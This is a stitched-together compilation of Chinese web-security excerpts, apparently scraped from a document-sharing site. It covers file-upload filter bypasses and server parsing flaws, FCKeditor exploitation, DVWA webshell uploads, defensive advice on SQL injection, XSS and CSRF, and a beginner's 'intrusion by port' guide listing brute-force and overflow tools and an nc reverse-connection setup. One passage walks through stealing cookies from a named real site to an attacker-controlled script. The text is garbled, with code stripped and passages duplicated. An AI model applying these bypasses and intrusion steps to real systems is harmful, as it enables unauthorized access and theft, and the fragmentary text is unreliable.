文件上传漏洞(绕过方法)
文件上传校验姿势
?客户端javascript校验(一般只校验后缀名)
?服务端校验
1)文件头content-type字段校验(image/gif)
2)文件内容头校验(GIF89a)
3)后缀名黑名单校验
4)后缀名白名单校验
5)自定义正则校验
?WAF设备校验(根据不同的WAF产品而定)
文件上传绕过校验方法
客户端绕过(抓包改包)
方法:可以利用burp抓包改包,先上传一个gif类型的木马,然后通过
burp将其改为asp/php/jsp后缀名即可。
服务器端绕过
1)文件类型绕过
方法:通过抓包,将content-type字段改为image/gif。
2)文件头绕过
方法:在木马内容基础上再加了一些文件信息,
如GIF89a
3)文件后缀名绕过
即黑名单校验,一般有个专门的 blacklist 文件,里面会包含常见
的危险脚本文件。
方法:
(1)找黑名单扩展名的漏网之鱼,如下jsp:jspx、jspf;asp:asa、
cer、aspx;php:php、php3、php4;exe:exee
(2)可能存在大小写绕过漏洞,例如:aSp、pHp。
4)配合操作系统文件命令规则
(1)上传不符合windows文件命名规则的文件名:
test.asp.
test.asp(空格)
test.php:1.jpg
test.php::$DATA
shell.php::$DATA……
(2)linux下后缀名大小写
5)配合其他规则
0x00截断:基于一个组合逻辑漏洞造成的,通常存在于构造上传文件路径的时候。test.php(0x00).jpg、test.php%00.jpg。
例如:
路径/upload/1.php(0x00),文件名1.jpg,结合/upload/1.php(0x00)/1.jpg 伪代码演示:
6)配合文件包含漏洞
前提:校验规则只校验当文件后缀名为asp/php/jsp的文件内容是否为木马。绕过方式:(这里拿php为例,此漏洞主要存在于PHP中)
(1)先上传一个内容为木马的txt后缀文件,因为后缀名的关系没有检验内容;
(2)然后再上传一个.php的文件,
内容为
此时,这个php文件就会去引用txt文件的内容,从而绕过校验,下面列举包含的语法:
服务器解析漏洞
(一)IIS5.x-6.x解析漏洞
目录解析(6.0)
形式:https://www.360docs.net/doc/b118156555.html,/xx.asp/xx.jpg
原理: 服务器默认会把.asp,.asa目录下的文件都解析成asp文件。
文件解析
形式:https://www.360docs.net/doc/b118156555.html,/xx.asp;.jpg
原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp 文件了。
解析文件类型
IIS6.0 默认的可执行文件除了asp还包含这三种 :
/test.asa
/test.cer
/test.cdx
(二)apache解析漏洞
Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.owf.rar “.owf”和”.rar”这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php。
(三)nginx解析漏洞
漏洞形式
https://www.360docs.net/doc/b118156555.html,/UploadFiles/image/1.jpg/1.php
https://www.360docs.net/doc/b118156555.html,/UploadFiles/image/1.jpg%00.php
https://www.360docs.net/doc/b118156555.html,/UploadFiles/image/1.jpg/%20\0.php
另外一种手法:上传一个名字为test.jpg,以下内容的文件。
');?> 然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。
java开发常见漏洞及处理说明
j a v a开发常见漏洞及处 理说明 集团标准化小组:[VVOPPT-JOPP28-JPPTL98-LOPPNN]
J a v a常见漏洞及 处理说明 杨博 本文专门介绍针对javaweb程序常见高危安全漏洞(如:SQL注入、XSS跨站脚本攻击、文件上传)的过滤和拦截处理,确保系统能够安全的运行。 一.SQL注入(SQLInjection) 经分析确认本系统对SQL注入做了相应的过滤处理,可以有效应对SQL注入攻击,确保系统安全。 详细说明: 攻击方式:所谓SQL注入式攻击,就是的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 防御方式:对用户输入或请求进行预验证处理,过滤掉可能造成恶意SQL的字符。 本系统属于政府部门门户网站,用户发布的是新闻动态,不会涉及到学术研究SQL方面的东西,所以本系统采用过滤器的方式对用户输入或请求进行过滤处理,如果输入或请求涉及恶意SQL方面的字符将一律过滤掉,这不会影响用户的使用,同时确保了系统的安全。 系统配置文件web.xml初始化时同时初始化过滤器,过滤器起到全局作用,并设置为针对所有请求。 过滤器AntiSqlInjectionfilter: 二.XSS攻击(DOMXSS、StoredXSS、ReflectedXSS) 经确认本系统已对XSS攻击做了拦截及过滤处理,达到了有效对抗XSS攻击的效果,确保系统的安全。 详细说明: 攻击方式:XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS 漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。
各个端口的入侵方法(入侵菜鸟必看)
各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(小榕的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
====================================== 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破(字典是关键) 最后SQLTool*.**e入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
文件上传漏洞及解析漏洞总结
文件上传漏洞及解析漏洞总结 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 文件上传后导致的常见安全问题一般有: 1)上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行。 2)上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为(其他通过类似方式控制策略文件的情况类似); 3)上传文件是病毒、木马文件,黑客用以诱骗用户或者管理员下载执行。 4)上传文件是钓鱼图片或为包含了脚本的图片,在某些版本的浏览器中会被作为脚本执行,被用于钓鱼和欺诈。 除此之外,还有一些不常见的利用方法,比如将上传文件作为一个入口,溢出服务器的后台处理程序,如图片解析模块;或者上传一个合法的文本文件,其内容包含了PHP脚本,再通过"本地文件包含漏洞(Local File Include)"执行此脚本;等等。 要完成这个攻击,要满足以下几个条件: 首先,上传的文件能够被Web容器解释执行。所以文件上传后所在的目录要是Web容器所覆盖到的路径。 其次,用户能够从Web上访问这个文件。如果文件上传了,但用户无法通过Web访问,或者无法得到Web容器解释这个脚本,那么也不能称之为漏洞。 最后,用户上传的文件若被安全检查、格式化、图片压缩等功能改变了内容,则也可能导致攻击不成功。 一、从FCKEditor文件上传漏洞谈起 FCKEditor是一款非常流行的富文本编辑器,为了方便用户,它带有一个文件上传功能,但是这个功能却出过多次漏洞。 FCKEditor针对ASP/PHP/JSP等环境都有对应的版本,以PHP为例,其文件上传功能在:
信息安全常见漏洞类型汇总汇总
一、注入漏洞 注入攻击(),简称注入攻击、注入,被广泛用于非法获取网站控制权,是发生在应用程序地数据库层上地安全漏洞.在设计程序,忽略了对输入字符串中夹带地指令地检查,被数据库误认为是正常地指令而运行,从而使数据库受到攻击,可能导致数据被窃取、更改、删除,以及进一步导致网站被嵌入恶意代码、被植入后门程序等危害. 通常情况下,注入地位置包括: ()表单提交,主要是请求,也包括请求; ()参数提交,主要为请求参数; ()参数提交; ()请求头部地一些可修改地值,比如、等; ()一些边缘地输入点,比如文件地一些文件信息等.
注入地危害不仅体现在数据库层面上,还有可能危及承载数据库地操作系统;如果注入被用来挂马,还可能用来传播恶意软件等,这些危害包括但不局限于: ()数据库信息泄漏:数据库中存放地用户地隐私信息地泄露.作为数据地存储中心,数据库里往往保存着各类地隐私信息,注入攻击能导致这些隐私信息透明于攻击者. ()网页篡改:通过操作数据库对特定网页进行篡改. ()网站被挂马,传播恶意软件:修改数据库一些字段地值,嵌入网马链接,进行挂马攻击. ()数据库被恶意操作:数据库服务器被攻击,数据库地系统管理员帐户被篡改. ()服务器被远程控制,被安装后门.经由数据库服务器提供地操作系统支持,让黑客得以修改或控制操作系统.
()破坏硬盘数据,瘫痪全系统. 解决注入问题地关键是对所有可能来自用户输入地数据进行严格地检查、对数据库配置使用最小权限原则. 通常使用地方案有: ()所有地查询语句都使用数据库提供地参数化查询接口,参数化地语句使用参数而不是将用户输入变量嵌入到语句中.当前几乎所有地数据库系统都提供了参数化语句执行接口,使用此接口可以非常有效地防止注入攻击. ()对进入数据库地特殊字符('"\<>*;等)进行转义处理,或编码转换. ()确认每种数据地类型,比如数字型地数据就必须是数字,数据库中地存储字段必须对应为型. ()数据长度应该严格规定,能在一定程度上防止比较长地注入语句无法正确执行. ()网站每个数据层地编码统一,建议全部使用编码,上下层编码不一致有可能导致一些过滤模型被绕过.
FCKeditor编辑器漏洞利用
FCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页 FCKeditor/_samples/default.html查看编辑器版本 FCKeditor/_whatsnew.html 查看文件上传路径 fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径 Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6 [Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言 FCKeditor被动限制策略所导致的过滤不严问题 影响版本: FCKeditor x.x <= FCKeditor v2.4.3脆弱描述: FCKeditor v2.4.3中File类别默认拒绝上传类型: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件 上传后 它保存的文件直接用的¥sFilePath = ¥sServerDir . ¥sFileName,而没有使用¥sExtension为后缀直接导致在win下在上传文件后面加个.来突破[未测试] 而在apache下,因为"Apache文件名解析缺陷漏洞"也可以利用之,详见"附录A" 另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码,其限制最为狭隘。攻击利用: 月末分享 h t t p ://w w w .y u e m o b a r .c o m
CTF 文件上传检测的基本思路
文件上传检测的基本思路 1: 前台脚本检测扩展名—绕过 原理 当用户在客户端选择文件点击上传的时候,客户端还没有向服务器发送任何消息,就对本地文件进行检测来判断是否是可以上传的类型,这种方式称为前台脚本检测扩展名。 ?1绕过方法 . 绕过前台脚本检测扩展名,就是将所要上传文件的扩展名更改为符合脚本检测规则的扩展名,通过BurpSuite工具,截取数据包,并将数据包中文件扩展名更 改回原来的,达到绕过的目的。 . . 例如:文件名本来为【evil.jpg】,上传时,用BurpSuite截包后,将数据包中的名字改为【evil.php】(或其它脚本类型)即可。 . ?1 ?2 2: Content-Type检测文件类型—绕过 原理
当浏览器在上传文件到服务器的时候,服务器对说上传文件的Content-Type 类型进行检测,如果是白名单允许的,则可以正常上传,否则上传失败。 ?1绕过方法 绕过Content--Type文件类型检测,就是用BurpSuite截取并修改数据包中文件的Content-Type类型(如改为:image/gif),使其符合白名单的规则,达到上传的目的。 ?1 3: 文件系统00截断—绕过 原理 在上传的时候,当文件系统读到【0x00】时,会认为文件已经结束。利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0x00上传截断漏洞。 ?1绕过方法 通过抓包截断将【evil.php.jpg】后面的一个【.】换成【0x00】。在上传的时候,当文件系统读到【0x00】时,会认为文件已经结束,从而将【evil.php.jpg】的内容写入到【evil.php】中,从而达到攻击的目的。 ?1 4: 服务器端扩展名检测黑名单—绕过
文件上传漏洞利用及防御方案
文件上传漏洞利用及防御方案 作者美创科技安全实验室 01、漏洞介绍 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等。正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回。 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网。 02、文件上传漏洞原理 03、文件上传漏洞复现 利用DVWA靶场进行文件上传漏洞演练: 1.Low Security Level 查看源码: 这是最开始的页面: 我们尝试上传桌面上的一个图片2.jpg
这时,我们来研究一下这个路径:../../hackable/uploads/2.jpg succesfully uploaded! 这是一个绝对路径,我们直接输入网址http://127.0.0.1/DVWA/hackable/uploads/2.jpg 这时候,我们尝试上传桌面上的1.php文件,写入的内容为 如图,1.php文件上传成功,服务器并未做任何过滤限制: 我们再次访问上传的路径:http://127.0.0.1/DVWA/hackable/uploads/1.php 说明存在文件上传漏洞,能够上传并且执行php文件 这个时候如果上传一句话木马:
并用中国蚁剑进行连接,就可以得到这个服务器的Webshell 这样我们就可以访问这个服务器的任何文件夹,可见,文件上传漏洞的是非常具有危害性的。 2.Medium Security Level 查看源码: 源码中对上传的文件类型跟大小对进行了判断过滤,也就是说正常情况下,不能够上传不符合文件类型的文件。 我们用burpsuite抓包,将文件的上传类型修改为image/jepg
常见漏洞原理及防护方法
SQL注入 漏洞原理 如果程序根据用户输入的参数动态生产SQL语句并执行,黑客可以通过传入恶意参数值注入自己定义的语句,使数据库执行任意自己需要的指令,实现数据窃取或入侵破坏。 安全威胁 ?导致拖裤,敏感信息泄露 ?数据被篡改、删除 ?数据库主机服务器被入侵 需防护场景 所有用户输入参数并进行数据库操作的场景。除了常见的select、insert 场景,也必须警惕拼接参数使用like、having、group by、order by、limited、offset等子句场景,必须进行过滤转义。 防护方法 ?对于SQL注入,最稳妥和保险的方法只有使用预编译语句然后绑定变量。 通过使用占位符,保持查询语句和数据相分离。查询语句结构由占位符 定义,SQL语句发送给数据库并做好准备,然后准备好的语句与参数值 相结合。这样就防止了查询被篡改,因为参数值与已编辑好的语句相结 合,而不是SQL字符串。从根本上避免了用户输入的恶意参数当作SQL 语句执行。 ?当实在是有like、having、group by、order by、limited、offset等动态查询时才考虑白名单输入过滤,转义等方法。 ?弱类型语言,使用变量之前声明变量类型。
XSS跨站脚本 漏洞原理 如果web页面在动态展示数据时使用了用户输入的内容,但是未做输入过滤和输出转义,导致黑客可以通过参数传入恶意代码,当用户浏览页面时恶意代码会被执行。 跨站脚本攻击有三种形式 1.反射型跨站脚本攻击 攻击者会通过社会工程手段,发送一个URL链接给用户打开,在用户打开页面的同时,浏览器会执行页面中嵌入的恶意脚本。 2.存储型跨站脚本攻击 攻击者利用web应用程序提供的录入或修改数据功能,将数据存储到服务器或用户cookie中,当其他用户流量展示该数据的页面时,浏览器会执行页面中嵌入的恶意代码。所有浏览器都会受到攻击。 3.DOM型跨站脚本攻击 由于HTML页面中,定义了一段JS,根据用户的输入,显示一段HTML代码,攻击者可以在输入时,插入一段恶意脚本,最终展示时,会执行恶意脚本。 DOM跨站和以上两个跨站攻击的差别是,DOM跨站是纯页面脚本的输出,只有规范使用JavaScript,才可以防御。 安全威胁 利用跨站脚本攻击实现的攻击危害: ?窃取用户cookie,伪造用户身份登录。 ?控制用户浏览器 ?结合浏览器及其插件漏洞,下载木马病毒到浏览者的计算机上执行 ?衍生URL跳转漏洞 ?让官方网站出现钓鱼页面 ?蠕虫攻击 总而言之,前端脚本能实现的所有功能都会被跨站脚本利用 5.3需防护场景 所有将不可信的数据输出到HTML页面时的场景: ?将GAT参数值按原值输出到页面中(包括HTTP包头、HTML标签、JavaScript、CSS等处),必须做反射XSS防护。
跨站脚本执行漏洞详解-恶魔上传
跨站脚本执行漏洞详解 本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题(FAQ)。 【漏洞成因】 原因很简单,就是因为CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换。 【漏洞形式】 这里所说的形式,实际上是指CGI输入的形式,主要分为两种: 1.显示输入 2.隐式输入 其中显示输入明确要求用户输入数据,而隐式输入则本来并不要求用户输入数据,但是用户却可以通过输入数据来进行干涉。 显示输入又可以分为两种: 1.输入完成立刻输出结果 2.输入完成先存储在文本文件或数据库中,然后再输出结果 注意:后者可能会让你的网站面目全非!:( 而隐式输入除了一些正常的情况外,还可以利用服务器或CGI程序处理错误信息的方式来实施。 【漏洞危害】 大家最关心的大概就要算这个问题了,下面列举的可能并不全面,也不系统,但是我想应该是比较典型的吧。 1.获取其他用户Cookie中的敏感数据 2.屏蔽页面特定信息 3.伪造页面信息 4.拒绝服务攻击 5.突破外网内网不同安全设置 6.与其它漏洞结合,修改系统设置,查看系统文件,执行系统命令等 7.其它 一般来说,上面的危害还经常伴随着页面变形的情况。而所谓跨站脚本执行漏洞,也就是通过别人的网站达到攻击的效果,也就是说,这种攻击能在一定程度上隐藏身份。
【利用方式】 下面我们将通过具体例子来演示上面的各种危害,这样应该更能说明问题,而且更易于理解。为了条理更清晰一些,我们将针对每种危害做一个实验。 为了做好这些实验,我们需要一个抓包软件,我使用的是Iris,当然你可以选择其它的软件,比如NetXray什么的。至于具体的使用方法,请参考相关帮助或手册。 另外,需要明白的一点就是:只要服务器返回用户提交的信息,就可能存在跨站脚本执行漏洞。 好的,一切就绪,我们开始做实验!:) 实验一:获取其他用户Cookie中的敏感信息 我们以国内著名的同学录站点https://www.360docs.net/doc/b118156555.html,为例来说明一下,请按照下面的步骤进行: 1.进入首页https://www.360docs.net/doc/b118156555.html,/ 2.输入用户名“
”,提交,发现服务器返回信息中包含了用户提交的“”。 3.分析抓包数据,得到实际请求: https://www.360docs.net/doc/b118156555.html,/txl/login/login.pl?username=&passwd=&ok.x=28&ok .y=6 4.构造一个提交,目标是能够显示用户Cookie信息: https://www.360docs.net/doc/b118156555.html,/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6 5.如果上面的请求获得预期的效果,那么我们就可以尝试下面的请求:https://www.360docs.net/doc/b118156555.html,/txl/login/login.pl?username=&passwd=&ok.x=28&o k.y=6 其中https://www.360docs.net/doc/b118156555.html,/info.php是你能够控制的某台主机上的一个脚本,功能是获取查询字符串的信息,内容如下: 任意文件上传的原理、危害及防御
&passwd=&ok.x=28&ok .y=6 4.构造一个提交,目标是能够显示用户Cookie信息: https://www.360docs.net/doc/b118156555.html,/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6 5.如果上面的请求获得预期的效果,那么我们就可以尝试下面的请求:https://www.360docs.net/doc/b118156555.html,/txl/login/login.pl?username=&passwd=&ok.x=28&o k.y=6 其中https://www.360docs.net/doc/b118156555.html,/info.php是你能够控制的某台主机上的一个脚本,功能是获取查询字符串的信息,内容如下: 任意文件上传的原理、危害及防御
文件上传漏洞的原理、危害及防御 一.什么是文件上传漏洞 Web应用程序通常会有文件上传的功能,例如在BBS发布图片,在个人网站发布ZIP压缩包,在办公平台发布DOC文件等,只要Web应用程序允许上传文件,就有可能存在文件上传漏洞. 什么样的网站会有文件上传漏洞? 大部分文件上传漏洞的产生是因为Web应用程序没有对上传文件的格式进行严格过滤,还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护,后面我们会讲到一些常见的解析漏洞,最后还有一些不常见的其他漏洞,如IIS PUT漏洞等. 二.文件上传漏洞的危害 上传漏洞与SQL注入或XSS相比,其风险更大,如果Web应用程序存在上传漏洞,攻击者甚至可以直接上传一个webshell到服务器上. 什么是webshell? webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的. 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限.webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限.由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具.以上这段话源自百度百科对webshell的解释,如果对此感兴趣,可以搜索:一句话木马. 三.常见的解析漏洞 1.IIS解析漏洞 IIS6.0在解析文件时存在以下两个解析漏洞. ①当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件豆浆被IIS当作asp文件来解析. ②在IIS6.0下,分号后面的扩展名不会被解析,也就是说当文件为*.asp;.jpg 时,IIS6.0同样会以ASP脚本来执行. 2.Apache解析漏洞 在Apache 1.x和Apache 2.x中存在解析漏洞,但他们与IIS解析漏洞不同. Apache在解析文件时有一个规则:当碰到不认识的扩展名时,将会从后向前解析,直到碰到认识的扩展名位置,如果都不认识,则会暴露其源码.比如: 1.php.rar.xx.aa Apache首先会解析aa扩展名,如果不认识则接着解析xx扩展名,这样一直遍历到认识的扩展名为止,然后再将其进行解析. 3.PHP CGI解析漏洞 在PHP的配置文件中有一个关键的选项: cgi.fi: x_pathinfo.这个选项在某些版本是
常见WEB安全漏洞及整改建议
常见WEB安全漏洞及整改建议 1. HTML表单没有CSRF保护 1.1 问题描述: CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账……造成的问题包括:个人隐私泄露以及财产安全。 1.2 整改建议: CSRF的防御可以从服务端和客户端两方面着手,防御效果是从服务端着手效果比较好,现在一般的CSRF防御也都在服务端进行。有以下三种方法: (1).Cookie Hashing(所有表单都包含同一个伪随机值): (2).验证码 (3).One-Time Tokens(不同的表单包含一个不同的伪随机值) 1.3 案例: 1.服务端进行CSRF防御 服务端的CSRF方式方法很多样,但总的思想都是一致的,就是在客户端页面增加伪随机数。 1.3.1 Cookie Hashing(所有表单都包含同一个伪随机值): 这可能是最简单的解决方案了,因为攻击者不能获得第三方的Cookie(理论上),所以表单中的数据也就构造失败.
//构造加密的Cookie信息 $value = “DefenseSCRF”; setcookie(”cookie”, $value, time()+3600); ?> 在表单里增加Hash值,以认证这确实是用户发送的请求。 $hash = md5($_COOKIE['cookie']); ?> ”> 然后在服务器端进行Hash值验证 if(isset($_POST['check'])) { $hash = md5($_COOKIE['cookie']); if($_POST['check'] == $hash) { doJob(); } else {
告知书网站漏洞危害及整改建议
附件2: 网站漏洞危害及整改建议 1. 网站木马 1.1 危害 利用IE浏览器漏洞,让IE在后台自动下载黑客放置在网站上的木马并运行(安装)这个木马,即这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始,从而实现控制访问者电脑或安装恶意软件的目的。 1.2 利用方式 表面上伪装成普通的网页文件或是将恶意的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。可被木马植入的网页也意味着能被篡改页面内容。 1.3 整改建议 1) 加强网站程序安全检测,及时修补网站漏洞; 2) 对网站代码进行一次全面检测,查看是否有其余恶意程序存在; 3) 建议重新安装服务器及程序源码,防止有深度隐藏的恶意程序无法检测到,导致重新安装系统后攻击者仍可利用后门进入; 4) 如有条件,建议部署网站防篡改设备。
2 . 网站暗链 2.1 危害 网站被恶意攻击者插入大量暗链,将会被搜索引擎惩罚,降低权重值;被插入大量恶意链接将会对网站访问者造成不良影响;将会协助恶意网站(可能为钓鱼网站、反动网站、赌博网站等)提高搜索引擎网站排名。可被插入暗链的网页也意味着能被篡改页面内容。 2.2 利用方式 “暗链”就是看不见的网站链接,“暗链”在网站中的链接做的非常隐蔽,可能访问者并不能一眼就能识别出被挂的隐藏链接。它和友情链接有相似之处,可以有效地提高PR值,所以往往被恶意攻击者利用。 2.3 整改建议 1) 加强网站程序安全检测,及时修补网站漏洞; 2) 对网站代码进行一次全面检测,查看是否有其余恶意程序存在; 3) 建议重新安装服务器及程序源码,防止无法到检测深度隐藏的恶意程序,导致重新安装系统后攻击者仍可利用后门进入; 4) 如有条件,建议部署网站防篡改设备。 3 . 页面篡改 3.1 危害 政府门户网站一旦被篡改将造成多种严重的后果,主要表现在以下一些方面:
网络攻击技术及攻击实例介绍全解
网络攻击技术及攻击实例介绍 摘要:随着计算机网络的广泛使用,网络攻击技术也迅猛发展。研究网络攻击带来的各种威胁,有针对性的对这些威胁进行有效防范,是加固安全防御体系的重要途径。研究计算机网络攻击技术,模拟黑客行为,以敌手推演为模型、以攻防对抗为实践方式来验证网络整体安全防护效能,是加强网络安全防护的一种重要手段。本文介绍了WEB脚本入侵攻击、缓沖区滋出攻击、木马后门攻击、网络设备攻击、内网渗透攻击、拒绝服务攻击、网电空间对抗六种典型网络攻击技术及伊朗核设施遭震网技术的网络攻击案例。 一、网络攻击技术分类 计算机网络攻击是网络攻击者利用网络通信协议自身存在的缺陷、用户使用的操作系统内在缺陷或用户使用的程序语言本身所具有的安全隐患,通过使网络命令或者专门的软件非法进人本地或远程用户主机系统,获得、修改、删除用户系统的信息以及在用户系统上插入有害信息,降低、破坏网络使用效能等一系列活动的总称。 从技术角度看,计算机网络的安全隐患,一方面是由于它面向所有用户,所有资源通过网络共享,另一方面是因为其技术是开放和标准化的。层出不穷的网络攻击事件可视为这些不安全因素最直接的证据。其后果就是导致信息的机密性、完整性、可用性、真实性、可控性等安全属性遭到破坏,进而威胁到系统和网络的安全性。 从法律定义上,网络攻击是入侵行为完全完成且入侵者已在目标网络内。但是更激进的观点是(尤其是对网络安全管理员来说),可能使一个网络受到破坏的所有行为都应称为网络攻击,即从一个入侵者开始对目标机上展开工作的那个时刻起,攻击就开始了。通常网络攻击过程具有明显的阶段性,可以粗略的划分为三个阶段: 准备阶段、实施阶段、善后阶段。
文件上传漏洞绕过总结
一、客户端校验 一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。 判断方式:在浏览加载文件,但还未点击上传按钮时便弹出对话框,内容如:只允许上传.jpg/.jpeg/.png后缀名的文件,而此时并没有发送数据包。 绕过方法 1.绕过前台脚本检测扩展名,就是将所要上传文件的扩展名更改为符合脚本检测规则的扩展名,通过BurpSuite工具,截取数据包,并将数据包中文件扩展名更改回原来的,达到绕过的目的。 2.如果是JS脚本检测,在本地浏览器客户端禁用JS即可。可使用火狐浏览器的NoScript 插件、IE中禁用掉JS等方式实现。 二、服务端校验 1.Content-type字段校验 以PHP代码为例,模拟web服务器端的校验代码 1.
10. { 11. echo "File is valid, and was successfully uploaded.\n"; 12. } else { 13. echo "File uploading failed.\n"; 14. } 15. ?> 绕过方法 可以通过抓包,将content-type为合法类型。 text/plain(纯文本) text/html(HTML文档) text/javascript(js代码) application/xhtml+xml(XHTML文档) image/gif(GIF图像) image/jpeg(JPEG图像) image/png(PNG图像) video/mpeg(MPEG动画) application/octet-stream(二进制数据)
黑客新人必学的网站入侵基本知识
黑客新人必学的网站入侵基本知识 2007-07-08 08:05 1 上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。 怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL。 工具介绍:上传工具,老兵的上传工具、DOMAIN3.5,这两个软件都可以达到上传的目的,用NC也可以提交。 WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下,许多人都不理解,这里就详细讲下,其实WEBSHELL并不什么深奥的东西,是个 WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过 WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马)我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。 2 暴库:这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。
